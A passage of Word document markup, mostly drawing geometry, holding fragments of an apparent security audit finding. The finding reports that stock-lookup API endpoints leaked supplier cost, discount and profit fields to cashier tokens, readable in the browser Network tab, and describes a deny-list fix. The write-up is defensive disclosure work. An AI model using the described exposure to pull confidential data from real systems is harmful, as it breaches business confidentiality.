                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 2175" style="position:absolute;width:6381;height:1428;left:17526;top:1714;" coordsize="638175,142875" path="m9525,0l628650,0c631280,0,633525,930,635385,2791c637245,4651,638175,6896,638175,9525l638175,133350c638175,135979,637245,138212,635385,140072c633525,141932,631280,142863,628650,142875l9525,142875c6895,142863,4650,141932,2790,140072c930,138212,0,135979,0,133350l0,9525c0,6896,930,4651,2790,2791c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 2178" style="position:absolute;width:12192;height:1428;left:26574;top:1714;" coordsize="1219200,142875" path="m9525,0l1209675,0c1212306,0,1214551,930,1216411,2791c1218270,4651,1219200,6896,1219200,9525l1219200,133350c1219200,135979,1218270,138212,1216411,140072c1214551,141932,1212306,142863,1209675,142875l9525,142875c6895,142863,4650,141932,2790,140072c930,138212,0,135979,0,133350l0,9525c0,6896,930,4651,2790,2791c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 2181" style="position:absolute;width:6953;height:1428;left:52387;top:1714;" coordsize="695326,142875" path="m9526,0l685801,0c688431,0,690676,930,692536,2791c694396,4651,695326,6896,695326,9525l695326,133350c695326,135979,694396,138212,692536,140072c690676,141932,688431,142863,685801,142875l9526,142875c6895,142863,4650,141932,2790,140072c930,138212,0,135979,1,133350l1,9525c0,6896,930,4651,2790,2791c4650,930,6895,0,9526,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 2184" style="position:absolute;width:6953;height:1333;left:0;top:3524;" coordsize="695325,133350" path="m9525,0l685800,0c688430,0,690675,930,692535,2778c694395,4638,695325,6896,695325,9525l695325,123825c695325,126442,694395,128687,692535,130547c690675,132407,688430,133338,685800,133350l9525,133350c6895,133338,4650,132407,2790,130547l0,123825l0,9525l2790,2778c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 2187" style="position:absolute;width:10477;height:1333;left:7620;top:3524;" coordsize="1047750,133350" path="m9525,0l1038225,0c1040855,0,1043100,930,1044960,2778c1046820,4638,1047750,6896,1047750,9525l1047750,123825c1047750,126442,1046820,128687,1044960,130547c1043100,132407,1040855,133338,1038225,133350l9525,133350c6895,133338,4650,132407,2790,130547c930,128687,0,126442,0,123825l0,9525c0,6896,930,4638,2790,2778c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 2190" style="position:absolute;width:6381;height:1333;left:31623;top:3524;" coordsize="638175,133350" path="m9525,0l628650,0c631280,0,633525,930,635385,2778c637245,4638,638175,6896,638175,9525l638175,123825c638175,126442,637245,128687,635385,130547c633525,132407,631280,133338,628650,133350l9525,133350c6895,133338,4650,132407,2790,130547c930,128687,0,126442,0,123825l0,9525c0,6896,930,4638,2790,2778c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 2193" style="position:absolute;width:7524;height:1333;left:40671;top:3524;" coordsize="752475,133350" path="m9525,0l742950,0c745580,0,747825,930,749685,2778c751545,4638,752475,6896,752475,9525l752475,123825c752475,126442,751545,128687,749685,130547c747825,132407,745580,133338,742950,133350l9525,133350c6895,133338,4650,132407,2790,130547c930,128687,0,126442,0,123825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The </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>front end</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hid supplier cost and margin columns from an employee, but the API sent the numbers anyway. With an ordinary cashier token, all five endpoints needed for stock lookup returned confidential fields: </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>grns</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grns</w:t>
      </w:r>
      <w:proofErr w:type="spell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stock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grns</w:t>
      </w:r>
      <w:proofErr w:type="spell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 xml:space="preserve">product/{code}/batches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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>grns</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id}</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and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grns</w:t>
      </w:r>
      <w:proofErr w:type="spell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code/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>grnCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>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The responses exposed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stock_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>price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actual_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cost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main_branch_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>price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supplier discount levels, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>total_cost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>total_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>profit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p>
    <w:p w14:paraId="6D446566"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This is not a display bug. A cashier can open the browser Network tab and read exactly what the shop pays for each </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tyre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, calculate the margin, and disclose supplier terms to a competitor. V-02 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>had</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> already restricted the profit </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reports</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to administrators; these operational stock APIs remain legitimately reachable by cashiers, so the property-level policy must be enforced in the response itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F2E2E0"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799552" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="31606FE8" wp14:editId="5BB1F2B1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>256282</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-20014</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1333500" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="30600" name="Group 30600"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1333500" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1333500" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2245" name="Shape 2245"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1333500" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1333500" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1323975" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1326605" y="0"/>
                                  <a:pt x="1328850" y="930"/>
                                  <a:pt x="1330710" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1332570" y="4638"/>
                                  <a:pt x="1333500" y="6896"/>
                                  <a:pt x="1333500" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1333500" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1333500" y="135979"/>
                                  <a:pt x="1332570" y="138212"/>
                                  <a:pt x="1330710" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1328850" y="141932"/>
                                  <a:pt x="1326605" y="142863"/>
                                  <a:pt x="13239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600" style="width:105pt;height:11.25pt;position:absolute;z-index:-2147483611;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:20.1797pt;mso-position-vertical-relative:text;margin-top:-1.57601pt;" coordsize="13335,1428">
                <v:shape id="Shape 2245" style="position:absolute;width:13335;height:1428;left:0;top:0;" coordsize="1333500,142875" path="m9525,0l1323975,0c1326605,0,1328850,930,1330710,2778c1332570,4638,1333500,6896,1333500,9525l1333500,133350c1333500,135979,1332570,138212,1330710,140072c1328850,141932,1326605,142863,1323975,142875l9525,142875c6895,142863,4650,141932,2790,140072c930,138212,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0576" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="54B86137" wp14:editId="407670EB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2656582</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-20014</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2057400" cy="485775"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="30601" name="Group 30601"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2057400" cy="485775"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2057400" cy="485775"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2248" name="Shape 2248"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1104899" y="0"/>
                            <a:ext cx="228600" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="228600" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="219075" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="221705" y="0"/>
                                  <a:pt x="223950" y="930"/>
                                  <a:pt x="225811" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="227670" y="4638"/>
                                  <a:pt x="228600" y="6896"/>
                                  <a:pt x="228600" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="228600" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="228600" y="135979"/>
                                  <a:pt x="227670" y="138212"/>
                                  <a:pt x="225811" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="223950" y="141932"/>
                                  <a:pt x="221705" y="142863"/>
                                  <a:pt x="2190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251" name="Shape 2251"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1600199" y="0"/>
                            <a:ext cx="457200" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="457200" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="447675" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="450305" y="0"/>
                                  <a:pt x="452550" y="930"/>
                                  <a:pt x="454410" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="456270" y="4638"/>
                                  <a:pt x="457200" y="6896"/>
                                  <a:pt x="457200" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="457200" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="457200" y="135979"/>
                                  <a:pt x="456270" y="138212"/>
                                  <a:pt x="454410" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="452550" y="141932"/>
                                  <a:pt x="450305" y="142863"/>
                                  <a:pt x="4476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255" name="Shape 2255"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="171450"/>
                            <a:ext cx="866775" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="866775" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="857250" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="859880" y="0"/>
                                  <a:pt x="862125" y="930"/>
                                  <a:pt x="863985" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="865845" y="4638"/>
                                  <a:pt x="866775" y="6883"/>
                                  <a:pt x="866775" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="866775" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="866775" y="135979"/>
                                  <a:pt x="865845" y="138212"/>
                                  <a:pt x="863985" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="862125" y="141932"/>
                                  <a:pt x="859880" y="142863"/>
                                  <a:pt x="857250"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259" name="Shape 2259"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="352424" y="352425"/>
                            <a:ext cx="1285875" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1285875" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1276350" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1278981" y="0"/>
                                  <a:pt x="1281225" y="930"/>
                                  <a:pt x="1283086" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1284946" y="4638"/>
                                  <a:pt x="1285875" y="6896"/>
                                  <a:pt x="1285875" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1285875" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1285875" y="126454"/>
                                  <a:pt x="1284946" y="128699"/>
                                  <a:pt x="1283086" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1281225" y="132407"/>
                                  <a:pt x="1278981" y="133338"/>
                                  <a:pt x="1276350" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>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601" style="width:162pt;height:38.25pt;position:absolute;z-index:-2147483603;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:209.18pt;mso-position-vertical-relative:text;margin-top:-1.57601pt;" coordsize="20574,4857">
                <v:shape id="Shape 2248" style="position:absolute;width:2286;height:1428;left:11048;top:0;" coordsize="228600,142875" path="m9525,0l219075,0c221705,0,223950,930,225811,2778c227670,4638,228600,6896,228600,9525l228600,133350c228600,135979,227670,138212,225811,140072c223950,141932,221705,142863,219075,142875l9525,142875c6895,142863,4650,141932,2790,140072c930,138212,0,135979,0,133350l0,9525c0,6896,930,4638,2790,2778c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 2251" style="position:absolute;width:4572;height:1428;left:16001;top:0;" coordsize="457200,142875" path="m9525,0l447675,0c450305,0,452550,930,454410,2778c456270,4638,457200,6896,457200,9525l457200,133350c457200,135979,456270,138212,454410,140072c452550,141932,450305,142863,447675,142875l9525,142875c6895,142863,4650,141932,2790,140072c930,138212,0,135979,0,133350l0,9525c0,6896,930,4638,2790,2778c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 2255" style="position:absolute;width:8667;height:1428;left:0;top:1714;" coordsize="866775,142875" path="m9525,0l857250,0c859880,0,862125,930,863985,2778c865845,4638,866775,6883,866775,9525l866775,133350c866775,135979,865845,138212,863985,140072c862125,141932,859880,142863,857250,142875l9525,142875c6895,142863,4650,141932,2790,140072c930,138212,0,135979,0,133350l0,9525c0,6883,930,4638,2790,2778c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 2259" style="position:absolute;width:12858;height:1333;left:3524;top:3524;" coordsize="1285875,133350" path="m9525,0l1276350,0c1278981,0,1281225,930,1283086,2778c1284946,4638,1285875,6896,1285875,9525l1285875,123825c1285875,126454,1284946,128699,1283086,130559c1281225,132407,1278981,133338,1276350,133350l9525,133350c6895,133338,4650,132407,2790,130559c930,128699,0,126454,0,123825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Fix.</w:t>
      </w:r>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HidesCostFromEmployees</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> applies a model-level default deny list to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Grn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GrnItem</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Cost, discount and margin attributes are hidden on every serialization unless </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>revealCostTo</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receives an administrator. The two endpoints that construct response arrays manually use the same single </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>costFieldsVisibleTo</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decision, returning only availability, selling price and final customer price to employees. This is intentionally fail-safe: a future endpoint that serializes either model omits supplier terms unless an administrator is explicitly authorized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F6B013" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="101"/>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1600" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1AD6BD77" wp14:editId="3B2F4CC2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2475607</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>153082</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="809625" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="30602" name="Group 30602"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="809625" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="809625" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2267" name="Shape 2267"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="809625" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
